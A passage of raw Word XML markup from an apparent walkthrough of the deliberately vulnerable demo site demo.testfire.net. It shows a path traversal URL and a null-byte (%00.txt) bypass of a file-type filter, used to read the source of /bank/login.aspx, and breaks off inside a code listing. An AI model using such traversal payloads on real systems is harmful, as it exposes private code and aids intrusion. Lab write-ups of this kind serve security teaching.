          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> found before to do that.</w:t>
      </w:r>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u w:val="single"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
        <w:instrText>HYPERLINK "http://demo.testfire.net/default.aspx?content=../bank/login.aspx.cs"</w:instrText>
        <w:fldChar w:fldCharType="separate"/>
        <w:t/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro Regular" w:eastAsia="Source Sans Pro Regular" w:hAnsi="Source Sans Pro Regular" w:cs="Source Sans Pro Regular"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="24"/>
          <w:u w:val="single"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>http://demo.testfire.net/default.aspx?content=../bank/login.aspx.cs</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro Regular" w:eastAsia="Source Sans Pro Regular" w:hAnsi="Source Sans Pro Regular" w:cs="Source Sans Pro Regular"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> will result in</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="996401"/>
        <w:tblW w:w="4275" w:type="dxa"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0600"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="329"/>
        <w:gridCol w:w="3945"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="871"/>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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3945"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Error! File must be of type TXT or HTM</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We’ll have to bypass the filter in order to get the file. Remember the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro Bold" w:eastAsia="Source Sans Pro Bold" w:hAnsi="Source Sans Pro Bold" w:cs="Source Sans Pro Bold"/>
          <w:b w:val="true"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>null string vulnerability</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro Regular" w:eastAsia="Source Sans Pro Regular" w:hAnsi="Source Sans Pro Regular" w:cs="Source Sans Pro Regular"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">? Here we go: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro Regular" w:eastAsia="Source Sans Pro Regular" w:hAnsi="Source Sans Pro Regular" w:cs="Source Sans Pro Regular"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="24"/>
          <w:u w:val="single"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
        <w:instrText>HYPERLINK "http://demo.testfire.net/default.aspx?content=../bank/login.aspx.cs%EF%BF%BD.txt"</w:instrText>
        <w:fldChar w:fldCharType="separate"/>
        <w:t/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro Regular" w:eastAsia="Source Sans Pro Regular" w:hAnsi="Source Sans Pro Regular" w:cs="Source Sans Pro Regular"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="24"/>
          <w:u w:val="single"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>http://demo.testfire.net/default.aspx?content=../bank/login.aspx.cs%00.txt</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro Regular" w:eastAsia="Source Sans Pro Regular" w:hAnsi="Source Sans Pro Regular" w:cs="Source Sans Pro Regular"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>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That will show you the content of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro Regular" w:eastAsia="Source Sans Pro Regular" w:hAnsi="Source Sans Pro Regular" w:cs="Source Sans Pro Regular"/>
          <w:i w:val="true"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>/bank/login.aspx.cs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro Regular" w:eastAsia="Source Sans Pro Regular" w:hAnsi="Source Sans Pro Regular" w:cs="Source Sans Pro Regular"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>. Now you can inspect the the source code to find more vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:spacing w:after="274" w:before="274"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro Semibold" w:eastAsia="Source Sans Pro Semibold" w:hAnsi="Source Sans Pro Semibold" w:cs="Source Sans Pro Semibold"/>
          <w:b w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="33"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>/bank/login.aspx</w:t>
      </w:r>
      <w:r/>
      <w:bookmarkStart w:id="15" w:name="_Tocaecvvpkd2vox"/>
      <w:bookmarkEnd w:id="15"/>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Here is the source code (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro Regular" w:eastAsia="Source Sans Pro Regular" w:hAnsi="Source Sans Pro Regular" w:cs="Source Sans Pro Regular"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="24"/>
          <w:u w:val="single"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
        <w:instrText>HYPERLINK "http://demo.testfire.net/default.aspx?content=../bank/login.aspx.cs%EF%BF%BD.txt"</w:instrText>
        <w:fldChar w:fldCharType="separate"/>
        <w:t/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro Regular" w:eastAsia="Source Sans Pro Regular" w:hAnsi="Source Sans Pro Regular" w:cs="Source Sans Pro Regular"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="24"/>
          <w:u w:val="single"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>http://demo.testfire.net/default.aspx?content=../bank/login.aspx.cs%00.txt</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro Regular" w:eastAsia="Source Sans Pro Regular" w:hAnsi="Source Sans Pro Regular" w:cs="Source Sans Pro Regular"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="107636"/>
        <w:tblW w:w="12705" w:type="dxa"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0600"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="540"/>
        <w:gridCol w:w="12165"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="40291"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="54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 xml:space="preserve">  1</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">  2</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">  3</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">  4</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">  5</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">  6</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">  7</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">  8</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">  9</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 10</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 11</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 12</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 13</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 14</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 15</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 16</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 17</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 18</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 19</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 20</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 21</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 22</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 23</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 24</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 25</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 26</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 27</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 28</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 29</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 30</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 31</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 32</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 33</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 34</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 35</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 36</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 37</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 38</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 39</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 40</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 41</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 42</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 43</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 44</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 45</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 46</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 47</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 48</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 49</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 50</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
